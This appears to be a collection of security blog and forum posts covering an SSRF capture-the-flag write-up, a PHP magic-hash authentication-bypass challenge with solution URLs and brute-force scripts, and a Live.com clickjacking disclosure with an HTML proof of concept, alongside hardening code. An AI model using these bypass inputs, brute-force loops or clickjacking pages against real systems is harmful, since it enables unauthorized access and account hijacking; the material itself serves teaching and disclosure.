Overview
Recently, I was playing around with the Drupal CMS application code. Drupal is an open source CMS widely used for blogging; to know more about Drupal, see
here. The advantage of an open source application is that the source code was at my disposal.
While fiddling around with the core Drupal vendor package I stumbled upon a very interesting XSS vulnerability. The idea then was to see how exactly an attacker could exploit this particular XSS to impact Drupal users at large.
So let me walk you through the technical process of discovery and impact assessment for this Drupal source code audit, which led to the discovery of an XSS that an attacker can use to hijack Drupal accounts or to perform other malicious activity.
Read more here: http://blog.securelayer7.net/core-drupal-8-0-0-beta14-xss-attack/
Thank you for reading my blog
At SecureLayer7, we continuously try to keep our customers updated on the latest threats that could affect their infrastructure and help them secure their perimeter. More often than not we devise attack scenarios and then brainstorm how to block such attempts. During one such brainstorming session, we took an interesting detour to check a couple of our ideas.
For more detail: http://blog.securelayer7.net/malware-detection-adding-glastopf-juice-to-maldet-engine/
Thank you for reading
Hi,
I’ve posted complete details about CVE-2015-2652 – Unauthenticated File Upload in Oracle E-Business Suite at the following company link.
http://blog.securelayer7.net/cve-2015-2652-unauthenticated-file-upload-in-oracle-e-business-suite/
– S
Last time we organized a CTF based on a web application vulnerability, SSRF / XSPA. For those who are new to SSRF, please go through this slide deck: http://www.slideshare.net/d0znpp/ssrf-attacks-and-sockets-smorgasbord-of-vulnerabilities.
Just for the record, the next G4H Ranchoddas Webcast is on Mobile Applications and registration is open.
You can find the CTF source code here: https://github.com/sandeepl337/Garage4hackers-March-2015-CTF-SSRF-XSPA .
On the CTF server we ran an internal application on port 80 and an external application. The mission of the CTF was to find the flag in a PHP file. The vulnerable external application extracts the title of any website it is given.
Following Write up from Hai Au Huynh:
—— START ——
First, putting “foobar” into the url parameter, we got “Caught exception: _(asfsafindex.php): failed to open stream: No such file or directory” => the application parses our input as a file and reads it.
So it’s clear that the next step is to read the source code of the application; we put “index.php” into the url parameter and get the index.php source code.
The code is going to do something like this:
include(‘include/
Get the contents of the url parameter input; if it has a title tag, print out the title, if not print out the contents of the input. With the include/extractTitleLogic.php disclosure, we try to read the contents of include/extractTitleLogic.php, but it contains the title tag, so we cannot read it. Fortunately, include/index.php does
not, so we can read it out.
In source code of include/index.php, we get “// “The feeling that conversations and any data (whiteboard included)
are encrypted without having to mess around with complicated options and setup is a massive plus. It’s very very easy to use.” –
zorgalicious
// // You Found key! w00t!!
// Decrypt Blowfish following code and send CTF Flag to following email
// 49FE06DB9909C6FC6AE11D44F12CD3
The first quote seems to make sense, so we search for it, and it leads to this
http://www.bitwiseim.com/
So at this point it’s very clear that we can decrypt the Blowfish message at that site, and get the flag: Garage4Hacker Private Key:
0x33331337
—— END ——
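The write-up shows the root cause: the url parameter went straight into a file/stream function, so url=index.php read a local file and a URL pointing at 127.0.0.1 reached the internal application on port 80. As an added example (not the CTF’s code, and not its extractTitleLogic.php, which is not reproduced here), this is the fetch step of the same “give me a URL, I return its title” feature with the checks the CTF application lacked. It is PHP 7.4+; all function names, the hostnames and the resolver mapping are assumptions made for the demonstration, and the resolver is injectable so the verdicts can be produced offline.

```php
<?php
// Added example, not the CTF's code: the fetch step of the title extractor
// with scheme, userinfo and address checks. Function names are assumed.

/**
 * Returns null if $url may be fetched, otherwise a reason for refusing it.
 * $resolve maps a hostname to an IP; it defaults to gethostbyname() (a real
 * DNS lookup) and is injectable so the checks can be exercised offline.
 */
function validate_fetch_url(string $url, ?callable $resolve = null): ?string
{
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) {
        return 'not an absolute http(s) URL';       // "index.php", "file:///etc/passwd"
    }
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return "scheme {$p['scheme']} not allowed"; // php://, gopher://, ftp://, ...
    }
    if (isset($p['user']) || isset($p['pass'])) {
        return 'userinfo in URL';                   // http://trusted.example@127.0.0.1/
    }
    $host = strtolower(trim($p['host'], '[]'));     // parse_url keeps IPv6 brackets
    $ip = filter_var($host, FILTER_VALIDATE_IP)
        ? $host
        : ($resolve ?? 'gethostbyname')($host);
    if (!filter_var($ip, FILTER_VALIDATE_IP)) {
        return "host $host does not resolve";       // gethostbyname() returns the name on failure
    }
    // Loopback, RFC 1918, link-local (169.254.x.x metadata), 0/8, ::1, fc00::/7, ...
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    if (!filter_var($ip, FILTER_VALIDATE_IP, $flags)) {
        return "host $host resolves to non-public address $ip";
    }
    return null;
}

function extract_title(string $html): string
{
    // Escape before echoing: the remote page controls this string.
    return preg_match('#<title[^>]*>(.*?)</title>#is', $html, $m)
        ? htmlspecialchars(trim($m[1]), ENT_QUOTES, 'UTF-8')
        : '';
}

function fetch_title(string $url): string
{
    if (($why = validate_fetch_url($url)) !== null) {
        throw new InvalidArgumentException("refused: $why");
    }
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,            // a 302 to http://127.0.0.1/ would skip the check
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
        CURLOPT_MAXFILESIZE    => 1 << 20,
    ]);
    $body = curl_exec($ch);
    curl_close($ch);
    return extract_title((string) $body);
}

// Offline demonstration with a constructed resolver: these hostnames and
// addresses are made up for the example and are never looked up.
$fakeDns = fn(string $h) => [
    'example.org'         => '93.184.216.34',
    'internal.ctf.local'  => '10.0.0.5',
    'rebind.attacker.tld' => '127.0.0.1',
][$h] ?? $h;

$inputs = [
    'index.php',                         // the CTF's local file read
    'file:///etc/passwd',
    'http://127.0.0.1/',                 // the internal app on port 80
    'http://[::1]/',
    'http://169.254.169.254/latest/',    // cloud metadata endpoint
    'http://user@internal.ctf.local/',
    'http://rebind.attacker.tld/',
    'https://example.org/',
];
foreach ($inputs as $u) {
    printf("%-36s %s\n", $u, validate_fetch_url($u, $fakeDns) ?? 'ok');
}
```

Only the last input is accepted. Two caveats a reviewer would raise: the address validated here is not necessarily the one curl connects to (a hostname can answer differently on the second lookup, i.e. DNS rebinding), so in production pin the checked IP with CURLOPT_RESOLVE or route the fetch through an egress proxy that enforces the same policy; and redirects are deliberately not followed, because following them re-opens the hole the validation closed.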
Ho Ho Ho, the Xmas challenge has ended. This challenge was all about bypassing login authentication. Obviously, it was a fun challenge!! And the obvious hint was the password MD5 hash: a footnote was there in the source code.
    <!-- We are so generous, see we provided you password hash to login :) 0e100132199235687421930375421091
    if(0e100132199235687421930375421091 == md5($_GET['pass'])) {
        // Simple PHP CODE Logic
    } ?> -->
The Garage4Hackers Xmas Challenge is developed in PHP and is available to download for learning purposes.
Just a quick note: if you want to join the G4H CTF team, PM me, and check out last month’s Ranchoddas event.
And I’m back to business. The main purpose of the CTF is to understand PHP’s loose equality (==) operator for comparing values; you can also study the strcmp function in the same light. If a developer uses == without measuring the risk, it can be profitable for an attacker. However, the attack works only in the rare cases where both operands look numeric to PHP, which for MD5 output means a hash of the form 0e followed only by digits. We received some expected results and some unexpected ones, but in the end they are all results.
There were 4k+ unique hits on the CTF page in 24 hours, but only a few valid submissions were received.
Following is the list of ninjas who solved the challenge in time.
– jinmo123 - Good solution, but not the expected one
– tlk (https://twitter.com/tlk___) - Nice solution, but not the expected one
– stypr (https://stypr.com) - W00tt, expected solution
– Ajin Abraham - Nice solution, but not the expected one
– sagar popat - Nice solution, but not the expected one
– Sharath Unni - W00tt, expected solution
There were three ways to solve this CTF. The expected way was to bypass authentication using PHP’s loose equality (==) operator. Brute forcing the username was the second, easy way, and the last way was monkey testing. (Just kidding.)
PHP CTF Code:
    <?php
    error_reporting(0);
    $a = htmlentities($_GET['username']);
    $c = htmlentities($_GET['password']);
    $b = md5($c);
    if (!empty($a) AND !empty($b)) { // empty function made this CTF more easy
        if ("0e100132199235687421930375421091" == $b) { // vulnerable line
            if ($b === "0e100132199235687421930375421091") { // To Avoiding some bugs and change behavior of CTF
                if ("133E-1337" === $a) { // To Avoiding some bugs and change behavior of CTF
                    print "Flag : Garage4H4x0rFlagPhpFlag1337";
                } else {
                    print "umm!! nice try dude :), oops! you don't know username";
                }
            } else {
                if ($a === "0e100132199235687421930375421091") { // To Avoiding some bugs and change behavior of CTF
                    print "umm!! nice try dude :), oops! ";
                } else {
                    if ("133E-1337" == $a) { // vulnerable line
                        print "Flag : Garage4H4x0rFlagPhpFlag1337";
                    } else {
                        print "Wrong Username";
                    }
                }
            }
        } else {
            print "wrong Password";
        }
    }
    ?>
Here is some background on the PHP equality operator. Expected behavior of PHP ==:
    Input        | Output
    -------------+--------
    "0" == "0"   | True
    "1" == "0"   | False
Unexpected behavior of PHP ==:
    Input        | Output
    -------------+--------
    "0e1" == "0" | True
In detail:
PHP treats "0e1" as a numeric string in scientific notation, 0e1 = 0 * 10 ^ 1 = 0, so the two strings are compared as numbers and the answer is 0 == 0.
<?php var_dump("0e1" == 0); ?>
    Finding entry points
    Branch analysis from position: 0
    Return found
    filename:       /in/Pvj4s
    function name:  (null)
    number of ops:  4
    compiled vars:  none
    line     # *  op                  fetch  ext  return  operands
    ---------------------------------------------------------------------------------
       2     0  >   IS_EQUAL                       ~0      '0e1', 0
             1      SEND_VAL                               ~0
             2      DO_FCALL                  1            'var_dump'
             3    > RETURN                                 1
Here is where the fun starts. With the hash literal left unquoted, this is a comparison of a number against whatever string md5() returns, and plenty of developers store MD5 hashes as passwords. Check out the following MD5 hash:
    var_dump(0e100132199235687421930375421091 == md5(urldecode('%02%a27%84')));
    bool(true) // w00t :)
Another string :
'\x98-\xde\x1f'
// Submission by Beched (@ahack_ru)
try here : http://3v4l.org/NK5hp
Our check was too simple to bypass because we hadn’t put quotes around the hash. PHP parses the bare literal 0e100132199235687421930375421091 as the float 0.0, and in PHP 7 and earlier a non-numeric string converts to 0 when compared with a number, so the expression is true for any hash that does not start with [1-9]. (PHP 8 compares a number with a non-numeric string as strings, so this particular variant no longer works there; the quoted-hash variant below still does, because two numeric strings are still compared numerically.)
Here is bypass if we use quote around hash:
    php > var_dump('0e100132199235687421930375421091'==md5("\x0e\xd7\xb6\xea")); // Submission by Beched (@ahack_ru)
    bool(true)
Try here : http://3v4l.org/M9dpY
Here is another simple example, which can be found on the internet.
http://3v4l.org/2vrMi
While testing this CTF, Sharath Unni found a second hash that passes the check:
    0e100132199235687421930375421091 (found in the HTML source code)
    0e104142395260374396839196939683 (reported as the MD5 of 26177715789)
Strictly speaking this is not an MD5 collision: the two hashes differ, but both are "0e" followed only by digits, so PHP treats each as a numeric string with value 0 and they compare equal under ==. You can look the second one up at
http://www.md5online.org/
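To put the two comparisons side by side, here is an added example (my code, not the CTF’s): the CTF’s password and username checks rewritten in plain PHP 7+, with the loose == next to hash_equals() and ===. The stored hash is the one the CTF leaked; QNKCDZO and 240610708 are the magic strings used in the submissions below, whose md5 output starts with 0e; hunter2 and the username candidates are constructed inputs.

```php
<?php
// Added example (not the CTF's code): the same password and username checks
// written with the loose "==" operator and with strict comparisons.
// STORED_HASH is the hash the CTF leaked in its HTML source.
const STORED_HASH = "0e100132199235687421930375421091";

// Vulnerable: "0e" followed only by digits is a numeric string (0 * 10^n),
// so any md5() output of that shape compares equal to STORED_HASH.
function loose_password_ok(string $password): bool
{
    return STORED_HASH == md5($password);
}

// Hardened: hash_equals() compares byte-wise in constant time and never
// coerces its arguments to numbers.
function strict_password_ok(string $password): bool
{
    return hash_equals(STORED_HASH, md5($password));
}

// The CTF's username check: "133E-1337" is also a numeric string and
// underflows to 0.0, so any numeric string with value 0 matches under "==".
function loose_username_ok(string $username): bool
{
    return "133E-1337" == $username;
}

function strict_username_ok(string $username): bool
{
    return "133E-1337" === $username;
}

// Constructed candidates: two well-known magic strings (md5 starts with 0e)
// and one ordinary password.
foreach (["QNKCDZO", "240610708", "hunter2"] as $pw) {
    printf("%-10s md5=%s  loose=%-5s strict=%s\n", $pw, md5($pw),
        var_export(loose_password_ok($pw), true),
        var_export(strict_password_ok($pw), true));
}
// Constructed usernames: everything that is numerically zero passes "==".
foreach (["133E-1337", "0", "00", "-0", "0e12323", "0.0", "admin"] as $u) {
    printf("%-10s loose=%-5s strict=%s\n", $u,
        var_export(loose_username_ok($u), true),
        var_export(strict_username_ok($u), true));
}
```

Running it shows loose=true for QNKCDZO and 240610708 and for every username except admin, while the strict functions accept nothing but the real values. This holds on PHP 8 as well: PHP 8 only changed how a number compares with a non-numeric string, and a hash-to-hash comparison is numeric string against numeric string, which is still done numerically. The fix is the same everywhere: never compare secrets with ==, use hash_equals() (or password_verify() for password hashes), and quoting the literal is not enough on its own.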
That was all about the PHP equality operator; now, what is the solution of this CTF?
Here is the solution, and you can find many more ways:
http://162.208.48.16/?username=0e57640477961333848717747276704&password=BRTKUJZ&submit=Login&debug=true
http://162.208.48.16/?username=0e1&password=NOOPCJF&submit=Login&debug=true
http://162.208.48.16/?username=0e2&password=26177715789&submit=Login&debug=true
Submission by jinmo123
http://162.208.48.16/?username=000&password=240610708&submit=Login#
Submission by tlk ( https://twitter.com/tlk___ )
Brute Force Script:
    import requests

    s = requests.session()
    # Try every single-byte username with a magic-hash password.
    for i in range(255):
        r = s.get("http://162.208.48.16/?username=" + chr(i) + "&password=QNKCDZO&submit=Login")
        print(len(r.content), chr(i), i, "Wrong Username" in r.text)
We can see that only #, & and 0 do not contain "Wrong Username". Let's try to prepend '0':
        r = s.get("http://162.208.48.16/?username=0" + chr(i) + "&password=QNKCDZO&submit=Login")
http://162.208.48.16/?username=0.0&password=QNKCDZO&submit=Login
Two submissions by stypr (https://stypr.com)
http://162.208.48.16/?username=0e57640477961333848717747276704&password=BRTKUJZ&submit=Login&debug=true
http://162.208.48.16/?username=0x00&password=BRTKUJZ&submit=Login&debug=true
Submission by Ajin Abraham
    import urllib2

    # Try each line of a common-usernames wordlist against a magic-hash password.
    with open("10k most common.txt", "r") as f:
        url = 'http://162.208.48.16/?username=[X]&password=26177715789'
        no = 0
        for line in f:
            turl = url.replace("[X]", line).replace("\n", "").replace("\r", "")
            response = urllib2.urlopen(turl)
            html = response.read()
            dat = html[:50]
            no += 1
            log = str(no) + " Username: " + line + "Response: " + dat
            if ("Wrong" in log):
                print no
            else:
                print log
            response.close()
URL:http://162.208.48.16/?username=-0&password=26177715789
Submission by Sagar Popat
http://162.208.48.16/?username=00&password=26177715789&submit=Login
Submission by Sharath Unni
http://162.208.48.16/?username=0e12323&password=26177715789&submit=Login
That’s all for today. Thank you for reading.
Check out Recordings of Browser Crash Analysis By David Rude II aka Bannedit
On 7/29/13 I reported a Live.com XFO (X-Frame-Options) vulnerability to the Microsoft Security team; their investigation has finally come to a conclusion and the bug is fixed. So here are the details of the bug and the timeline of the fix. A year ago, on a weekend, I started digging into MS services for bugs, and this vulnerability seemed the most interesting one to share on Garage4Hackers.
The timeline of the investigation of the bug: July 29, 2013 – April 16, 2014.
The interesting part of the vulnerability: all pages were protected against UI redressing (clickjacking), and while testing I normally try the application on all browsers. Here comes the weird part: I was able to iframe all the pages of Live.com, including pre-authentication and post-authentication pages, on Mozilla Firefox 3.6.28 through Mozilla Firefox 6. On Chrome and on other browsers XFO was working perfectly on all pages.
Random announcement, nothing to do with this post: check out the recorded video of the Garage4Hackers Ranchoddas Webcast Series – Browser Crash Analysis by David Rude II aka Bannedit.
Note: have a look at the same vulnerability in Facebook application installing.
Obviously, you must be thinking why this is happening with Mozilla. After doing some research and consulting with the G4H team, I concluded it may be an issue with the Gecko engine. The test environment was Windows 7 and Ubuntu 10, 11 and 12.
Note: if you have stumbled upon the same issue with Gecko, please reply on this thread.
Check out the following headers; the XFO header is missing on Gecko/20120306 Firefox/3.6.28 through Firefox 6.
https://blu166.mail.live.com/m/?bfv=wm

    GET /m/?bfv=wm HTTP/1.1
    Host: blu166.mail.live.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 115
    Connection: keep-alive
    Cookie:

    HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Encoding: gzip
    Vary: Accept-Encoding
    Server: Microsoft-IIS/7.5
    X-Wlp-StartTime: 29-07-2013 10:10:32 AM
    xxn: 22
    P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
    MSNSERVER: H: BLU166-W22 V: 17.1.6722.6001 D: 2013-07-22T22:56:20
    X-Powered-By: ASP.NET
    Content-Length: 3113
    Date: Mon, 29 Jul 2013 10:10:32 GMT
    Connection: keep-alive
    Set-Cookie: bfv=wm; domain=.live.com; path=/
    Set-Cookie: widecontext=X; path=/; secure
    Set-Cookie: domain=.live.com; path=/
    Set-Cookie: xidseq=7; domain=.live.com; path=/
    Set-Cookie: LD=; domain=.live.com; expires=Mon, 29-Jul-2013 08:30:32 GMT; path=/
    Cache-Control: no-cache, no-store, must-revalidate, no-transform
    Pragma: no-cache
    Expires: -1, -1
Here are some screenshots of basic operations on live.com (let me remind you, every page of live.com was vulnerable).
The attacker developed this page to attack the victim.
Composing Email :
Uploading Attachment :
Deleting Emails :
[IMG]https://dl.dropboxusercontent.com/u/18007092/ms-click4.png[/IMG]
HTML PoC which I sent to the MS Security Team (the iframe is left half transparent so the overlay is visible; a real attack sets opacity to 0):
    <html>
    <!-- This Quick Developed POC , for testing purpose -->
    <!-- Visit Garage4hackers.com -->
    <head>
    <title> Live Mail Send Clickjacking - Garage4hackers.com </title>
    <style>
    iframe {
        width:800px;
        height:800px;
        position:absolute;
        top:0;
        left:0;
        filter:alpha(opacity=50); /* in real life opacity=0 */
        opacity:0.5;
    }
    </style>
    </head>
    <body>
    <br> <br> <br> <br> <br> <br> <br> <br> <br>
    <div><center>Bhag Milkha Bhag Competition</center></div>
    <center><b>Click Connect, You will Bhag Muilkha Bhag T-shirts. </b></center>
    <!-- the victim's compose page, pre-filled with the attacker's address, sits on top of the bait link -->
    <iframe src="https://blu166.mail.live.com/m/compose.m/?fid=00000000-0000-0000-0000-000000000001&to=sandeepk.l337@gmail.com"></iframe>
    <a href="http://www.google.com" target="_blank" style="position: relative; left: 0px; top: 220px; z-index: -1;">Connect</a>
    </body>
    </html>
Let me know if you have any question about this bug
– [S]
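The bug above only showed up when the same page was requested with a particular User-Agent, so the useful check is one that runs over several captured responses and reports what anti-framing protection each one carries. As an added example (my code, not part of the original report), here is a small PHP 7.1+ checker that takes a raw header block, as saved from a proxy, and lists the findings. The two header blocks are constructed: the first is trimmed from the capture above, the second is what a fixed response should send. The function names are assumptions.

```php
<?php
// Added example (not part of the original report): report the anti-framing
// headers a raw HTTP response carries. Function names are assumed.

/** Parse a raw header block ("Name: value\r\n...") into name => [values]. */
function parse_headers(string $raw): array
{
    $out = [];
    foreach (preg_split('/\r?\n/', $raw) as $line) {
        if (strpos($line, ':') === false) {
            continue;                        // status line or blank line
        }
        [$name, $value] = explode(':', $line, 2);
        $out[strtolower(trim($name))][] = trim($value);
    }
    return $out;
}

/**
 * Returns a list of findings; an empty list means the page cannot be framed
 * by another origin (on a browser that honours the headers).
 */
function frame_protection_findings(string $raw): array
{
    $h = parse_headers($raw);
    $findings = [];

    $xfo = $h['x-frame-options'] ?? [];
    if (!$xfo) {
        $findings[] = 'X-Frame-Options missing';
    } else {
        $v = strtoupper($xfo[0]);
        if ($v !== 'DENY' && $v !== 'SAMEORIGIN') {
            // ALLOW-FROM is obsolete and ignored by modern browsers; ALLOWALL
            // was never a standard value.
            $findings[] = "X-Frame-Options has weak or unsupported value '$v'";
        }
    }

    $hasFrameAncestors = false;
    foreach ($h['content-security-policy'] ?? [] as $policy) {
        if (preg_match('/(?:^|;)\s*frame-ancestors\s+([^;]+)/i', $policy, $m)) {
            $hasFrameAncestors = true;
            $src = strtolower(trim($m[1]));
            if ($src !== "'none'" && $src !== "'self'") {
                $findings[] = "frame-ancestors permits '$src' (review the allowed origins)";
            }
        }
    }
    if (!$hasFrameAncestors) {
        $findings[] = 'Content-Security-Policy frame-ancestors missing (X-Frame-Options only)';
    }
    return $findings;
}

// Sample 1 (constructed, trimmed from the Firefox 3.6 capture above): no
// framing protection at all.
$gecko = "HTTP/1.1 200 OK\r\n"
       . "Content-Type: text/html; charset=utf-8\r\n"
       . "Server: Microsoft-IIS/7.5\r\n"
       . "X-Powered-By: ASP.NET\r\n"
       . "Cache-Control: no-cache, no-store, must-revalidate, no-transform\r\n";

// Sample 2 (constructed): what a fixed response should send. Both headers
// must be emitted on every response, never keyed on the User-Agent.
$fixed = "HTTP/1.1 200 OK\r\n"
       . "Content-Type: text/html; charset=utf-8\r\n"
       . "X-Frame-Options: DENY\r\n"
       . "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n";

foreach (['gecko' => $gecko, 'fixed' => $fixed] as $label => $raw) {
    $f = frame_protection_findings($raw);
    echo "$label: ", $f ? implode('; ', $f) : 'framing blocked', "\n";
}
```

The first sample yields two findings (no X-Frame-Options, no frame-ancestors), the second none. On the application side the fix is two header() calls made unconditionally, before any output: header('X-Frame-Options: DENY'); and header("Content-Security-Policy: frame-ancestors 'none'");. Checking the resulting headers with a few different User-Agent strings, rather than from one browser, is what would have caught this class of bug.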
Yesterday night, while the Garage4Hackers Ranchoddas event was running, I received a message from the Microsoft Security Team with the following statement regarding one vulnerability on multiple pages [nearly all pages] of Live.com / hotmail.com [mobile version].
I hope they fix this very soon, and I’ll share more details on the bug on Garage4hackers.com.
Thank You
Sandeep
After a lot of technical problems, we’re done! Thank you for your patience! I will re-record this and post it on YouTube and garage4hackers.com in a few days.
Thank you
Dear all,
Garage4Hackers invites you to join us for a webinar titled “Data, data, data! I can’t make bricks without clay” by Gynvael Coldwind – Google Security Engineer and Dragon Sector Team Captain.
For registration, please fill in the following form.
https://docs.google.com/forms/d/1L3-…RlNdI/viewform
Reverse engineering is more an art than a science. From the realms of vulnerability discovery to debugging for internals, reverse engineers are a rare breed with the ability to think backwards along the chain of events, discovering the technological principles of a device, object, or system through analysis of its structure, function, and operation. With the growth of exploit development and the rise of malware attacks, reverse engineering is becoming a key area to study.
==UPDATE==
Video stream: https://plus.google.com/events/c2puj…m01lo615eio8a8 or http://www.garage4hackers.com/pages.php?pageid=4
Questions / chat: #g4h @ irc.freenode.org (or via web: http://www.garage4hackers.com/pages.php?pageid=3)
–UPDATE–
What to expect:
The presentation would revolve more around the approaches taken in RE than usage of tools. It will be focused on various practical tips and tricks that can speed up the process of reverse-engineering. The presented information will not be strictly tied to any specific platform or tool – most of it can be applied on any architecture or operating system.
Examples of topics:
– how to start with an unknown architecture
– debugger scripting
– creating your own useful tools
– etc
Prerequisites:
– some reverse-engineering experience or general interest in reverse-engineering
– basic programming skills
– basic knowledge of how the CPU and operating systems work